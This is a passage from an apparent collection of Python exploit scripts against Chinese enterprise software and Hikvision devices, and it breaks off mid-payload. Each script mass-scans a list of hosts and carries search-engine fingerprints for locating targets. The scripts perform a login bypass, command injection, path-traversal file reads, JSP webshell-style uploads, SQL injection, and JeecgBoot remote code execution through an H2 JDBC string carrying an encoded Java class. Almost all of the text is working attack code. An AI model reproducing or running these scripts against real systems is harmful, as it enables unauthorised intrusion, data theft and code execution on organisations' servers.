 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # FOFA：app="飞企互联-FE企业运营管理平台"
 6 | # Zoomeye: iconhash: "e90223165de1b1c7ae95336f10c3fe5d"
 7 | 
 8 | import sys
 9 | import requests
10 | import csv
11 | import urllib3
12 | import hashlib
13 | from concurrent.futures import ThreadPoolExecutor
14 | 
15 | if len(sys.argv) != 2:
16 |     print(
17 |         '+----------------------------------------------------------------------------------------------------------+')
18 |     print(
19 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                   +')
20 |     print(
21 |         '+----------------------------------------------------------------------------------------------------------+')
22 |     print(
23 |         '+ USE: python3 <filename> <hosts.txt>                                                                           +')
24 |     print(
25 |         '+ EXP: python3 Feiqihulian_FE_Login_Bypass_Exp.py url.txt                                                         +')
26 |     print(
27 |         '+----------------------------------------------------------------------------------------------------------+')
28 |     sys.exit()
29 | proxysdata = {
30 | 'http': '127.0.0.1:8080',
31 | 'https': '127.0.0.1:8080'
32 | } 
33 | def poc(host):
34 |     if "http" in host:
35 |         url = host
36 |     else:
37 |         url ="http://"+host
38 |     host1=url.replace("http://","")
39 |     host2=host1.replace("https://","")
40 |     headers1 = {
41 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
42 |         "Host": "%s" % host2  
43 |     }
44 |     #payload1='/2.ln?SYS_LINK=77507068764957484a5067777862714f457a66574871642f4330574c76717868394a35496d37416c497951724f33446f51486375685a5a2b31684938472b7056'
45 |     payload2='/loginService.fe?op=D'
46 |     try:
47 |         #r1 = requests.get(url+payload1, headers=headers1)
48 |         r2 = requests.get(url+payload2, headers=headers1)
49 |         if "流程" in r2.text:
50 |             cookies=r2.headers['Set-Cookie']
51 |             headers2 = {
52 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
53 |         "Host": "%s" % host2,
54 |         "Cookie":"%s"%cookies  
55 |         }
56 |         
57 |             r3=requests.get(url+"/main/main.jsp",headers=headers2)
58 |             if "系统配置" in r3.text:
59 |                 print(url+payload2+"\ncookies:"+r2.headers['Set-Cookie'])
60 |         else:
61 |             return 0
62 |             print (host+":false")
63 |     except:
64 |         pass
65 |         #print (host+":false")
66 | 
67 | if __name__ == '__main__':
68 |     file = sys.argv[1]
69 |     data = open(file)
70 |     reader = csv.reader(data)
71 |     with ThreadPoolExecutor(50) as pool:
72 |         for row in reader:
73 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/Hikvison_IP_Duijiang_Ping_Rce.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fofa：icon_hash="-1830859634"
 6 | # zoomeye: iconhash: "e854b2eaa9e4685a95d8052d5e3165bc"
 7 | # hunter: web.title=="IP Intercom & PA System"
 8 | 
 9 | import sys
10 | import requests
11 | import csv
12 | import urllib3
13 | import hashlib
14 | from concurrent.futures import ThreadPoolExecutor
15 | 
16 | if len(sys.argv) != 2:
17 |     print(
18 |         '+----------------------------------------------------------------------------------------------------------+')
19 |     print(
20 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
21 |     print(
22 |         '+-------------------------------------------------------------------------------------------------- -------+')
23 |     print(
24 |         '+ USE: python3 <filename> <hosts.txt>                                                                       +')
25 |     print(
26 |         '+ EXP: python3 Hikvison_IP_Duijiang_Ping_Rce.py url.txt                                                  +')
27 |     print(
28 |         '+-------------------------------------------------------------------------------------------------- --------+')
29 |     sys.exit()
30 | proxysdata = {
31 | 'http': '127.0.0.1:8080'
32 | } 
33 | def poc(host):
34 |     if "http" in host:
35 |         url = host
36 |     else:
37 |         url ="http://"+host
38 |     host1=url.replace("http://","")
39 |     host2=host1.replace("https://","")
40 |     headers = {
41 |         "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Chrome/83.0.4103.116 Safari/537.36",
42 |         "Accept-Encoding":"gzip, deflate",
43 |         "Accept": "*/*",
44 |         "Connection":"close",
45 |         "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
46 |         "Host":"%s" % host2,
47 |         "X-Requested-With": "XMLHttpRequest"
48 | 
49 |     }
50 |     vulurl = url + "/php/ping.php"
51 |     data="jsondata%5Btype%5D=99&jsondata%5Bip%5D=whoami"
52 |     try:
53 |         r = requests.post(vulurl, headers=headers,data=data)
54 |         # print(r.content)
55 |         
56 |         if ("admin" or "root" in r.text) and len(r.text) > 20 and len(r.text) < 100 and "res" not in r.text and "whoami" not in r.text: 
57 |             print(host+str(r.text))
58 |             #print(r.text)
59 |         else:
60 |             return 0
61 |     except:
62 |         return 0
63 | 
64 | 
65 | if __name__ == '__main__':
66 |     file = sys.argv[1]
67 |     data = open(file)
68 |     reader = csv.reader(data)
69 |     with ThreadPoolExecutor(50) as pool:
70 |         for row in reader:
71 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/Hikvison_Showfile_Download_File_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # product="HIKVISION-视频编码设备接入网关"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
23 |     print(
24 |         '+ EXP: python3 Hikvison_Showfile_Download_File_Poc.py url.txt                                               +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8081'
30 | }  
31 | def exp(host):
32 |     if "http" in host:
33 |         url = host
34 |     else:
35 |         url ="http://"+host
36 |     host1=url.replace("http://","")
37 |     host2=host1.replace("https://","")
38 |     headers = {
39 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
40 |         "Content-Type": "multipart/form-data;multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85",
41 |         "Host": "%s" %host2
42 |     }
43 |     headers2 = {
44 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
45 |         "Accept": "*/*",
46 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
47 |         "Accept-Encoding": "gzip, deflate",
48 |         "Host": "%s" %host2
49 |     }
50 |     vulurl = url + "/serverLog/showFile.php?fileName=../web/html/safe.php"
51 |     try:
52 |         
53 |         r = requests.post(vulurl, headers=headers)
54 |         if r.status_code==200 and "Code By" in r.text:
55 |             print(url+" :true")    
56 |         else:
57 |             return 0
58 |             print (host+":false")
59 |     except:
60 |         return 0
61 |         print (host+":false")
62 | 
63 | 
64 | if __name__ == '__main__':
65 |     file = sys.argv[1]
66 |     data = open(file)
67 |     reader = csv.reader(data)
68 |     with ThreadPoolExecutor(50) as pool:
69 |         for row in reader:
70 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/Hikvison_iSecure_Center_Report_Upload_File_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # icon_hash="-911494769"
 6 | # icon_hash="-1605849932"
 7 | 
 8 | import sys
 9 | import requests
10 | import csv
11 | import urllib3
12 | import hashlib
13 | from concurrent.futures import ThreadPoolExecutor
14 | urllib3.disable_warnings()
15 | if len(sys.argv) != 2:
16 |     print(
17 |         '+----------------------------------------------------------------------------------------------------------+')
18 |     print(
19 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
20 |     print(
21 |         '+----------------------------------------------------------------------------------------------------------+')
22 |     print(
23 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
24 |     print(
25 |         '+ EXP: python3 Hikvison_iSecure_Center_Report_Upload_File_Poc.py url.txt                                   +')
26 |     print(
27 |         '+----------------------------------------------------------------------------------------------------------+')
28 |     sys.exit()
29 | proxysdata = {
30 | 'http': '127.0.0.1:8081'
31 | }  
32 | #../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp
33 | #../../../tomcat85linux64.1/webapps/els/static/test.jsp
34 | def exp(host):
35 |     if "http" in host:
36 |         url = host
37 |     else:
38 |         url ="https://"+host
39 |     host1=url.replace("http://","")
40 |     host2=host1.replace("https://","")
41 |     headers = {
42 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
43 |         "Content-Type": "multipart/form-data;boundary=----WebKitFormBoundary9PggsiM755PLa54a",
44 |         "Host": "%s" %host2
45 |     }
46 |     headers2 = {
47 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
48 |         "Accept": "*/*",
49 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
50 |         "Accept-Encoding": "gzip, deflate,br",
51 |         "Host": "%s" %host2
52 |     }
53 |     data ='------WebKitFormBoundary9PggsiM755PLa54a\r\nContent-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp"\r\nContent-Type:application/zip\r\n\r\n<%out.print("test");%>\r\n\r\n------WebKitFormBoundary9PggsiM755PLa54a--'
54 |     data2='------WebKitFormBoundary9PggsiM755PLa54a\r\nContent-Disposition: form-data; name="file"; filename="../../../tomcat85linux64.1/webapps/els/static/test.jsp"\r\nContent-Type:application/zip\r\n\r\n<%out.print("test");%>\r\n\r\n------WebKitFormBoundary9PggsiM755PLa54a--'
55 |     vulurl = url + "/svm/api/external/report"
56 |     vulurl2= url+"/portal/ui/login/..;/..;/test.jsp"
57 |     vulurl3= url+"/els/static/test.jsp"
58 |     try:
59 |         r = requests.post(vulurl, headers=headers,data=data,verify=False)
60 |         r4 = requests.post(vulurl, headers=headers,data=data2,verify=False)
61 |         if  "code" in r.text or "code" in r4.text :
62 |             print(url+"存在上传接口")
63 |             r2=requests.get(vulurl2,headers=headers2,verify=False)
64 |             if r2.status_code==200 and "test" in r2.text:
65 |                 print(url+"/portal/ui/login/..;/..;/test.jsp")
66 |             r3=requests.get(vulurl3,headers=headers2,verify=False)
67 |             if r3.status_code==200 and "test" in r3.text:
68 |                 print(url+"/els/static/test.jsp")
69 |             #print("http://"+host+":true 文件地址为："+"")
70 |         else:
71 |             return 0
72 |             print (host+":false")
73 |     except:
74 |         return 0
75 |         print (host+":false")
76 | 
77 | 
78 | if __name__ == '__main__':
79 |     file = sys.argv[1]
80 |     data = open(file)
81 |     reader = csv.reader(data)
82 |     with ThreadPoolExecutor(50) as pool:
83 |         for row in reader:
84 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/Hikvison_iSecure_Center_ResourceOperations_Upload_File_Exp.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # icon_hash="-911494769"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                   +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                           +')
23 |     print(
24 |         '+ EXP: python3 Hikvison_iSecure_Center_Upload_File.py url.txt                                                         +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8080'
30 | }  
31 | def exp(host):
32 |     url = host
33 |     headers = {
34 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
35 |         "Content-Type": "multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo",
36 |         "Cookie": "ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169"
37 |     }
38 |     data ='------WebKitFormBoundaryGEJwiloiPo\r\nContent-Disposition: form-data; name="fileUploader";filename="mdtest.jsp"\r\nContent-Type: image/jpeg\r\n\r\nmdsec\r\n------WebKitFormBoundaryGEJwiloiPo'
39 |     vulurl = "http://"+url + "/eps/api/resourceOperations/upload?token="
40 |     try:
41 |         md5url="http://"+url+"/eps/api/resourceOperations/uploadsecretKeyIbuilding"
42 |         token =  hashlib.md5(md5url.encode(encoding='UTF-8')).hexdigest()
43 |         r = requests.post(vulurl+""+token.upper(), headers=headers,data=data,verify=False,proxies=proxysdata)
44 |         path = r.text.replace('\"',"").replace('{',"").replace('}',"").split('resourceUuid:')[1].split(",resourceType")[0]
45 |         if r.status_code==200 and "success" in r.text :
46 |             print("http://"+host+":true 文件地址为："+"{} ".format(url+"/eps/upload/"+path+".jsp"))
47 |         else:
48 |             return 0
49 |             print (host+":false")
50 |     except:
51 |         print (host+":false")
52 | 
53 | 
54 | if __name__ == '__main__':
55 |     file = sys.argv[1]
56 |     data = open(file)
57 |     reader = csv.reader(data)
58 |     with ThreadPoolExecutor(50) as pool:
59 |         for row in reader:
60 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/Hikvison_iSecure_Center_ResourceOperations_Upload_File_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # icon_hash="-911494769"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                   +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                           +')
23 |     print(
24 |         '+ EXP: python3 Hikvison_iSecure_Center_Upload_File.py url.txt                                                         +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | def poc(host):
29 |     url = host
30 |     headers = {
31 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
32 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
33 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
34 |         "Accept-Encoding": "gzip, deflate",
35 |         "Cookie": "ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169"
36 |     }
37 |     data ='service=http%3A%2F%2Fx.x.x.x%3Ax%2Fhome%2Findex.action'
38 |     vulurl = "http://"+url + "/eps/api/resourceOperations/upload"
39 |     try:
40 |         
41 |         r = requests.post(vulurl, headers=headers,data=data)
42 |         if r.status_code==200 and "token" in r.text :
43 |             print("http://"+host+":true")
44 |         else:
45 |             return 0
46 |             print (host+":false")
47 |     except:
48 |         print (host+":false")
49 | 
50 | 
51 | if __name__ == '__main__':
52 |     file = sys.argv[1]
53 |     data = open(file)
54 |     reader = csv.reader(data)
55 |     with ThreadPoolExecutor(50) as pool:
56 |         for row in reader:
57 |             pool.submit(poc, row[0])
58 | 


--------------------------------------------------------------------------------
/Hongfan_OA_Ioffice_Udfmr_Sql_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # app="红帆-ioffice"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+-------------------------------------------------------------------------------------------------- -------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                       +')
23 |     print(
24 |         '+ EXP: python3 Hongfan_OA_Ioffice_Udfmr_Sql_Poc.py url.txt                                                  +')
25 |     print(
26 |         '+-------------------------------------------------------------------------------------------------- --------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8080'
30 | } 
31 | def poc(host):
32 |     if "http" in host:
33 |         url = host
34 |     else:
35 |         url ="http://"+host
36 |     host1=url.replace("http://","")
37 |     host2=host1.replace("https://","")
38 |     headers = {      
39 |         "SOAPAction": '"http://tempuri.org/ioffice/udfmr/GetEmpSearch"',
40 |         "Content-Type": "text/xml; charset=utf-8",
41 |         "Host":"%s" % host2
42 |     }
43 |     vulurl = url + "/iOffice/prg/set/wss/udfmr.asmx"
44 |     data="""
45 |     <?xml version="1.0" encoding="utf-8"?>
46 |     <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
47 |         <soap:Body>
48 |             <GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">
49 |             <condition>1=user_name()</condition>
50 |             </GetEmpSearch>
51 |         </soap:Body>
52 |     </soap:Envelope>"""
53 | 
54 | 
55 |     try:
56 |         r = requests.post(vulurl, headers=headers,data=data)
57 |         #print(r.text)
58 |         if r.status_code==500 and "服务器无法处理请求" in r.text :
59 |             print(host+" : true")
60 |         else:
61 |             return 0
62 |             print (host+":false")
63 |     except:
64 |         return 0
65 |         print (host+":false")
66 | 
67 | 
68 | if __name__ == '__main__':
69 |     file = sys.argv[1]
70 |     data = open(file)
71 |     reader = csv.reader(data)
72 |     with ThreadPoolExecutor(50) as pool:
73 |         for row in reader:
74 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/Hongjing_HCM_Codesettree_Sql_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # app="HJSOFT-HCM"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+-------------------------------------------------------------------------------------------------- -------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                       +')
23 |     print(
24 |         '+ EXP: python3 Hongjing_HCM_Codesettree_Sql_Poc.py url.txt                                                  +')
25 |     print(
26 |         '+-------------------------------------------------------------------------------------------------- --------+')
27 |     sys.exit()
28 | 
29 | def poc(host):
30 |     if "http" in host:
31 |         url = host
32 |     else:
33 |         url ="http://"+host
34 |     host1=url.replace("http://","")
35 |     host2=host1.replace("https://","")
36 |     headers = {
37 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
38 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
39 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
40 |         "Accept-Encoding": "gzip, deflate",
41 |         "Host":"%s" % host2
42 |     }
43 |     vulurl = url + "/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hellohongjingHcm~27~2c~40~40version~2d~2d"
44 |     try:
45 |         r = requests.get(vulurl, headers=headers)
46 |         if r.status_code==200 and "SQL Server" in r.text :
47 |             print("http://"+host+" :true"+r.text[145:185])
48 |         else:
49 |             return 0
50 |             print (host+":false")
51 |     except:
52 |         return 0
53 |         print (host+":false")
54 | 
55 | 
56 | if __name__ == '__main__':
57 |     file = sys.argv[1]
58 |     data = open(file)
59 |     reader = csv.reader(data)
60 |     with ThreadPoolExecutor(50) as pool:
61 |         for row in reader:
62 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/Hongjing_HCM_KhFieldtree_Sql_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fofa:app="HJSOFT-HCM"
 6 | # FOFA：body='<div class="hj-hy-all-one-logo"'
 7 | 
 8 | 
 9 | import sys
10 | import requests
11 | import csv
12 | import urllib3
13 | import hashlib
14 | from concurrent.futures import ThreadPoolExecutor
15 | import time
16 | 
17 | if len(sys.argv) != 2:
18 |     print(
19 |         '+----------------------------------------------------------------------------------------------------------+')
20 |     print(
21 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
22 |     print(
23 |         '+-------------------------------------------------------------------------------------------------- -------+')
24 |     print(
25 |         '+ USE: python3 <filename> <hosts.txt>                                                                       +')
26 |     print(
27 |         '+ EXP: python3 Hongjing_HCM_KhFieldtree_Sql_Poc.py url.txt                                                  +')
28 |     print(
29 |         '+-------------------------------------------------------------------------------------------------- --------+')
30 |     sys.exit()
31 | 
32 | def poc(host):
33 |     if "http" in host:
34 |         url = host
35 |     else:
36 |         url ="http://"+host
37 |     host1=url.replace("http://","")
38 |     host2=host1.replace("https://","")
39 |     headers = {
40 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
41 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
42 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
43 |         "Accept-Encoding": "gzip, deflate",
44 |         "Host":"%s" % host2
45 |     }
46 |     vulurl = url + "/templates/attestation/.%2e/.%2e/servlet/performance/KhFieldTree?pointsetid=-1&subsys_id=1';waitfor+delay+'0:0:5'+--"
47 |     try:
48 |         start_time = time.time()
49 |         r = requests.get(vulurl, headers=headers)
50 |         end_time = time.time()
51 |         response_time = end_time - start_time
52 |         if r.status_code==200 and response_time >5 and response_time<6 :
53 |             print(host+" :true 延时注入时间:"+str(response_time)[:6]+"s")
54 |         else:
55 |             return 0
56 |             print (host+":false")
57 |     except:
58 |         return 0
59 |         print (host+":false")
60 | 
61 | 
62 | if __name__ == '__main__':
63 |     file = sys.argv[1]
64 |     data = open(file)
65 |     reader = csv.reader(data)
66 |     with ThreadPoolExecutor(50) as pool:
67 |         for row in reader:
68 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/JeecgBoot_testConnection_Rce.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fofa: title="Jeecg-Boot 快速开发平台" || body="积木报表"
 6 | 
 7 | import json
 8 | import sys
 9 | import requests
10 | import csv
11 | import urllib3
12 | import hashlib
13 | from concurrent.futures import ThreadPoolExecutor
14 | import jsonify
15 | urllib3.disable_warnings()
16 | 
17 | if len(sys.argv) != 2:
18 |     print(
19 |         '+----------------------------------------------------------------------------------------------------------+')
20 |     print(
21 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
22 |     print(
23 |         '+---------------------------------------------------------------------------------------------------------+')
24 |     print(
25 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
26 |     print(
27 |         '+ EXP: python3 JeecgBoot_testConnection_Rce.py url.txt                                             +')
28 |     print(
29 |         '+----------------------------------------------------------------------------------------------------------+')
30 |     sys.exit()
31 | proxysdata = {
32 | 'http': '127.0.0.1:8082'
33 | } 
34 | def poc(host):
35 |     if "http" in host:
36 |         url = host
37 |     else:
38 |         url ="http://"+host
39 |     host1=url.replace("http://","")
40 |     host2=host1.replace("https://","")
41 |     headers = {
42 |         "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15",
43 |         "Accept":"*/*",
44 |         "Host":"%s" % host2,
45 |         "Cmd":"whoami",
46 |         "Content-Type": "application/json"
47 |     }
48 |     vulurl = url + "/jmreport/testConnection"
49 |     data={
50 |           "id":"1",
51 |           "code":"ABC",
52 |           "dbType":"MySQL",
53 |           "dbDriver":"org.h2.Driver",
54 |           "dbUrl":"jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS EXEC AS 'void shellexec(String b) throws Exception {byte[] bytes\\;try{bytes=java.util.Base64.getDecoder().decode(b)\\;}catch (Exception e){e.printStackTrace()\\;bytes=javax.xml.bind.DatatypeConverter.parseBase64Binary(b)\\;}java.lang.reflect.Method defineClassMethod = java.lang.ClassLoader.class.getDeclaredMethod(\\\"defineClass\\\", byte[].class,int.class,int.class)\\;defineClassMethod.setAccessible(true)\\;Class clz=(Class)defineClassMethod.invoke(new javax.management.loading.MLet(new java.net.URL[0],java.lang.Thread.currentThread().getContextClassLoader()), bytes, 0,bytes.length)\\;clz.newInstance()\\;}'\\;CALL EXEC('yv66vgAAADEBawoAHQCSCgBEAJMKAEQAlAoAHQCVCACWCgAbAJcKAJgAmQoAmACaBwCbCgBEAJwIAIwKACAAnQgAnggAnwcAoAgAoQgAogcAowoAGwCkCAClCACmBwCnCwAWAKgLABYAqQgAqggAqwcArAoAGwCtBwCuCgCvALAIALEHALIIALMKAH4AtAoAIAC1CAC2CQAmALcHALgKACYAuQgAugoAfgC7CgAbALwIAL0HAL4KABsAvwgAwAcAwQgAwggAwwoAGwDEBwDFCgBEAMYKAMcAuwgAyAoAIADJCADKCgAgAMsIAMwKACAAzQoAIADOCADPCgAgANAIANEJAH4A0goAJgDTCgAmANQJAH4A1QcA1goARADXCgBEANgIAI0IANkKAH4A2ggA2woA3ADdCgAgAN4IAN8IAOAIAOEHAOIKAFAAkgoAUADjCADkCgBQAOUIAOYIAOcIAOgIAOkKAOoA6woA6gDsBwDtCgDuAO8KAFsA8AgA8QoAWwDyCgBbAPMKAFsA9AoA7gD1CgDuAPYKAC8A5QgA9woAIAD4CAD5CgDqAPoHAPsKACYA/AoAaQD9CgBpAO8KAO4A/goAaQD+CgBpAP8KAQABAQoBAAECCgEDAQQKAQMBBQUAAAAAAAAAMgoARAEGCgDuAQcKAGkBCAgBCQoALwEKCAELCAEMCgB+AQ0HAQ4BAAJpcAEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABHBvcnQBABNMamF2YS9sYW5nL0ludGVnZXI7AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMBAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAHZXhlY3V0ZQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAEZXhlYwEAB3JldmVyc2UBADkoTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9JbnRlZ2VyOylMamF2YS9sYW5nL1N0cmluZzsBAANydW4BAApTb3VyY2VGaWxlAQAHQTQuamF2YQwAgwCEDAEPARAMAREBEgwBEwEUAQAHdGhyZWFkcwwBFQEWBwEXDAEYARkMARoBGwEAE1tMamF2YS9sYW5nL1RocmVhZDsMARwBHQwBHgEfAQAEaHR0cAEABnRhcmdldAEAEmphdmEvbGFuZy9SdW5uYWJsZQEABnRoaXMkMAEAB2hhbmRsZXIBAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24MASABFAEABmdsb2JhbAEACnByb2Nlc3NvcnMBAA5qYXZhL3V0aWwvTGlzdAwBIQEiDAEaASMBAANyZXEBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwBJAElAQAQamF2YS9sYW5nL09iamVjdAcBJgwBJwEoAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAA2NtZAwAigCLDAEpASoBAAlzZXRTdGF0dXMMASsBLAEAEWphdmEvbGFuZy9JbnRlZ2VyDACDAS0BACRvcmcuYXBhY2hlLnRvbWNhdC51dGlsLmJ1Z